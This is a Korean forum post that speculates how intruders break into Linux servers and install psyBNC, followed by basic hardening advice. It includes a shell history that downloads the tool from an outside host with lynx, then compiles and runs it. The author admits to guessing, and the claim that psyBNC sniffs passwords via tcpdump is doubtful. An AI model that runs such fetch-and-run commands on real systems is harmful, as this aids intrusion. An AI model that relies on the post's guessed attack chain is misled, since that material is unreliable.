>> Edit article
이름
제목
패스워드
안녕하세요? psyBNC란 해킹툴에 대해 알아도, 알고도, 설명하지 못하거나 답변하지 못하는 분들은,.. 뭐하시는 분들일까요? 오늘 psybnc답변좀 검색해 볼라구 했더니 없네요.... 누가 그러더라구요... 왜 비싼 썬장비를 쓰냐면, 리눅스는 보안이 엉망이지않냐~! 리눅스 포럼사이트 들이 왜 해킹툴에 대한 언급은 하나도 않할까요? 정말 필요한건데,.. 적을 알고 싸워야 이기죠!~ 암튼,.. 해커의 침임방법은 다양합니다. 그중 계정없이 접속하는 방법을 잘은 모르지만, 추정해 보려고 합니다. 1. 열려있는 ftp를 탐색한다. 2. ftp서버를 통해 세그멘테이션 fault를 유발시켜 자신이 원하는 core파일을 생성시킨다. 3. 생성된 core를 통해 원격으로 계정을 생성한다.(보통 CGI 인터페이스를 사용함) 4. 생성된 계정으로 접속을 시도한다. 5. 본격적인 루트 계정을 얻기위해 psyBNC같은 툴을 다운로드 받는다. 아래는 example이다. -------------------- ls wget help lynx lynx http://www.psychoid.lam3rz.de/psyBNC2.3.tar.gz ls lynx http://www.psychoid.lam3rz.de/psyBNC2.3.tar.gz ls clear ls tar -zxvf psyBNC2.3.tar.gz ls cd psybnc make ls ./psybnc -------------------------------------------- 6. 위에서 보면, shell 커멘더라인에서 lynx란 text http 클라이언트를 통해 해킹툴을 다운로드 받는것입니다. 7. 그리고 툴을 컴파일하고, 실행하면, 툴이 동작합니다. 8. 물론, 툴이 하는일은 단순합니다. 시스템운영자가 사용하는 패스워드 계정 IP등 모든 정보를 tcpdump를 통해 자신이 지정한 서버로 송신하는 것이겠죠.. 9. 헐.. 그럼. 해킹완료.. 써글...넘들.. --- 보안/대처 방법 --- 1. 방화벽을 설치하고, 불필요한 데몬은 모두 죽인다. 2. 특히 ftp는 필요하지 않으면 죽이고, 필요하면 철저하게 패치된 ftp서버를 사용한다. 3. 서버를 정기적으로 점검한다. 모르는 계정이 있거나 passwd, shadow, group등의 파일에 모르는 라인이 있으면 바로 삭제한다. 4. 특히 ps, netstat, ls 등 중요한 유틸리티는 백업해 두었다가 정체불명의 프로세서나 포트등의 탐색에 지장이 없도록 한다. 왜냐면, 해커들은 자신의 툴을 감추기 위해 ps, netstat, ls등의 파일도 변경하는 경우가 있다. 이상입니다.
Copyleft
1999-2026 by
JSBoard Open Project
Theme Designed by
IDOO
All right reserved